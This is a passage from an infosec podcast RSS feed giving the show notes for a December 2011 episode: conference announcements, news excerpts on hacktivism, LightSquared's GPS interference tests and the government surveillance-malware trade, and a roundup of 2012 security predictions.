	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NO ONE could have foreseen the rise of hacktivism in the last year, and groups like Anonymous pose a growing threat to end users, according to chief security researcher at F-Secure Mikko Hypponen.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen said that there are three groups that present internet security threats &#8211; criminals, hacktivists and governments.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When asked by the INQUIRER which was the biggest threat to the individual, Hypponen said, &quot;For the average end user, nation state attacks won&#39;t affect them at all. They have nothing to steal from you.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He added, &quot;Criminals are a big threat but hacktivists are growing. A year ago it was isolated attacks on things like the Scientology religion but [hacktivists] started to make headlines with Wikileaks, when Anonymous came out to defend the whistle blowing site.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen said that typical hacktivist attacks such as leaking a web site&#39;s database including passwords &quot;will affect the end user&quot;, especially if the end user re-uses their passwords.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He added, &quot;This is a problem we didn&#39;t see happening. We weren&#39;t expecting Anonymous to be as big. Anonymous isn&#39;t going away. It is largely fuelled by this next generation that grew up with the net. The internet is as natural to them as breathing air.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hypponen thinks that eventually Anonymous will end up splitting into groups, which is how the offshoot Lulzsec was formed. He said, &quot;The only thing that connects these operations [is that] Anonymous is a brand &#8211; it&#39;s an open brand and anyone can take it.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Philip Falcone&rsquo;s proposed LightSquared Inc. wireless service caused interference to 75 percent of global-positioning system receivers examined in a U.S. government test, according to a draft summary of results.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The results from testing conducted Oct. 31 to Nov. 4 show that &ldquo;millions of fielded GPS units are not compatible&rdquo; with the planned nationwide wholesale service, according to the draft seen by Bloomberg News.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;LightSquared signals caused harmful interference to majority of GPS receivers tested,&rdquo; according to the draft prepared for a meeting next week of U.S. officials reviewing the LightSquared proposal. &ldquo;No additional testing is required to confirm harmful interference exists.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared, backed by $3 billion from Falcone&rsquo;s Harbinger Capital Partners hedge fund, faces challenges from makers of global-positioning system devices who say the service will disrupt navigation by cars, boats, tractors and planes. U.S. regulators are withholding approval as they check on claims of interference.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Reston, Virginia-based company has proposed offering high-speed mobile Internet service to as many as 260 million people using 40,000 base stations. The service would operate on airwaves formerly reserved mainly for satellites, and near those used by GPS devices.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared is proposing to operate at a lower power than the level used during the tests, and believes that its operations would affect about 10% of devices, Martin Harriman, executive vice president, said in an interview.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The tests worked off an &ldquo;extraordinarily conservative&rdquo; threshold and didn&rsquo;t show the devices&rsquo; performance was affected, Harriman said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If we&rsquo;re affecting the performance of the device &#8212; my goodness, we&rsquo;d like to be sure that doesn&rsquo;t happen,&rdquo; Harriman said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The laboratory testing was performed for the National Space-Based Positioning, Navigation, and Timing (PNT) Systems Engineering Forum, an executive branch body that helps advise policy makers on issues around GPS. It found that 69 of 92, or 75 percent, of receivers tested &ldquo;experienced harmful interference&rdquo; at the equivalent of 100 meters (109 yards) from a LightSquared base station.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The devices tested include those used for automobile and boat navigation. The forum is to present its results on Dec. 14 in Washington.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The testing was requested by the National Telecommunications &amp; Information Administration, a Commerce Department agency that oversees airwaves use. The agency is still reviewing data, Moira Vahey, a spokeswoman, said in an interview today.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The government is to test high-precision receivers, used in farm equipment and scientific instruments, next year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agencies participating in the testing included the Department of Defense and the Federal Aviation Administration, according to the draft summary. Companies participating included GPS makers Trimble Navigation Ltd. and Garmin Ltd., farm-gear maker Deere &amp; Co., and General Motor Co.&rsquo;s OnStar unit, according to the summary.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LightSquared is &ldquo;outraged by the illegal leak of incomplete government data,&rdquo; Harriman said in an e-mailed statement. &ldquo;This breach attempts to draw an inaccurate conclusion to negatively influence the future of LightSquared and narrowly serve the business interests of the GPS industry.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.f-secure.com/weblog/archives/00002279.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.f-secure.com/weblog/archives/00002279.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trojans, backdoors, keyloggers and eavesdropping is used by online criminals. The same techniques are also used by governments. Some government do this to spy on their own people or to find dissidents. Other governments do this while investigating criminal suspects.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Most of the technology used in such intrusions are not developed by the governments themselves. They are made by private companies which are specializing in providing exploits, infection proxies and backdoors to governments.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where do governments buy this stuff from? Well, there&#39;s a conference and a trade fair on this very topic. It&#39;s called ISS World and it runs five times a year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, you can&#39;t simply walk into these events, as they are &quot;by invitation only&quot;, and available only to &quot;Telecommunication service providers, government employees and Law Enforcement Officers&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nevertheless, we couldn&#39;t resist taking a peek when ISS World was in Kuala Lumpur this week.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.cio.com/security/16691/top-10-list-top-10-internet-security-prediction-lists"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.cio.com/security/16691/top-10-list-top-10-internet-security-prediction-lists</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here it is, so you don&#39;t have to enter the search term yourself: Top 10 list of all the internet security prediction lists (as ranked by Google) and &#8212; for no extra charge &#8212; their #1 prediction:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.sans.edu/research/security-laboratory/article/security-predict2011"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SANS Technology Institute</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security Grows Up</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.sans.edu/research/security-laboratory/article/northcuttpredict2012"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stephen Northcutt of SANS</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TEOTWAWKI (The End Of The World As We Know IT)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.maximumpc.com/article/news/fortinet_reveals_top_8_security_predictions_2012"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fortinet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ransomware to Take Mobile Devices Hostage</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.websense.com/assets/reports/2012-Predictions-WS-Security-Labs.pdf"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Websense</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your Social Media Identity May Prove More Valuable To Cybercriminals Than Your Credit Cards</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_predictions_2012.pdf"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">M86 Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Targeted Attacks Grow More Damaging and Complex &nbsp;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.schwartzmsl.com/tangledweb/2011/12/the-future-of-security-top-fiv.php"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Tangled Web</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Advanced persistent threats (APTs) will become more predominant </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.thetechherald.com/articles/2012-Predictions-Wombat-Security-Technologieshttp:/www.thetechherald.com/articles/2012-Predictions-Wombat-Security-Technologies"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wombat Security</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A variety of popular mobile devices will flood the enterprise, forcing IT departments to make users more accountable for their devices </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.businesscomputingworld.co.uk/top-9-cyber-security-trends-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Imperva</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security trumps compliance</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">9. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://www.businesscomputingworld.co.uk/top-5-security-predictions-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Tufin</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Firewall operations </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">10.</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;&nbsp;&nbsp;&nbsp;</span><a href="http://blog.lumension.com/4002/top-5-predictions-for-2012/"><span style="font-size:15px;font-family:Arial;color:#003366;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Lumension</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More Malware </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-544-biggest-threat-gps-dos-government-malware-emporium-3rd-party-faux-pas-top-10-most-secure-browser/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3263/0/infosec-daily-podcast-episode-544.mp3" length="24100700" type="audio/mpeg" />
		<itunes:duration>0:49:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 544 for December 12, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	SOLD OUT!!
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.theinquirer.net/inquirer/news/2128938/hacktivsim-risen-expectations
	NO ONE could have foreseen the rise of hacktivism in the last year, and groups like Anonymous pose a growing threat to end users, according to chief security researcher at F-Secure Mikko Hypponen.
	Hypponen said that there are three groups that present internet security threats &#8211; criminals, hacktivists and governments.
	When asked by the INQUIRER which was the biggest threat to the individual, Hypponen said, &#34;For the average end user, nation state attacks won&#39;t affect them at all. They have nothing to steal from you.&#34;
	He added, &#34;Criminals are a big threat but hacktivists are growing. A year ago it was isolated attacks on things like the Scientology religion but [hacktivists] started to make headlines with Wikileaks, when Anonymous came out to defend the whistle blowing site.&#34;
	Hypponen said that typical hacktivist attacks such as leaking a web site&#39;s database including passwords &#34;will affect the end user&#34;, especially if the end user re-uses their passwords.
	He added, &#34;This is a problem we didn&#39;t see happening. We weren&#39;t expecting Anonymous to be as big. Anonymous isn&#39;t going away. It is largely fuelled by this next generation that grew up with the net. The internet is as natural to them as breathing air.&#34;
	Hypponen thinks that eventually Anonymous will end up splitting into groups, which is how the offshoot Lulzsec was formed. He said, &#34;The only thing that connects these operations [is that] Anonymous is a brand &#8211; it&#39;s an open brand and anyone can take it.&#34;
	Source: http://www.businessweek.com/news/2011-12-09/falcone-s-lightsquared-said-to-disrupt-75-of-gps-in-tests.html
	Philip Falcone&#8217;s proposed LightSquared Inc. wireless service caused interference to 75 percent of global-positioning system receivers examined in a U.S. government test, according[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 543 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
